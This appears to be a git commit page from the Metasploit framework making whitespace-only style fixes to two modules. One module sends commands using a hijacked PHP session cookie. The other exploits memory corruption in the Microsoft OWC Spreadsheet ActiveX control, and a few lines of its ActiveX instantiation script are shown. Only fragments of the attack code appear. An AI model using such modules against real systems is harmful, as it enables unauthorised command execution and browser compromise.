style compliance fixes
git-svn-id: file:///home/svn/framework3/trunk@9893 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7a38599cea
commit
1ca054ba53
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
|
||||
|
||||
sessionid = res.headers['Set-Cookie'].split(';')[0]
|
||||
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}...")
|
||||
|
||||
send_request_cgi(
|
||||
|
|
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability within versions 10 and 11 of
|
||||
the Office Web Component Spreadsheet ActiveX control. This module was based on
|
||||
the Office Web Component Spreadsheet ActiveX control. This module was based on
|
||||
an exploit found in the wild.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -97,7 +97,7 @@ try {
|
|||
xobj = new ActiveXObject("OWC10.Spreadsheet");
|
||||
} catch(err) {
|
||||
try {
|
||||
xobj = new ActiveXObject("OWC11.Spreadsheet");
|
||||
xobj = new ActiveXObject("OWC11.Spreadsheet");
|
||||
} catch(err) {
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue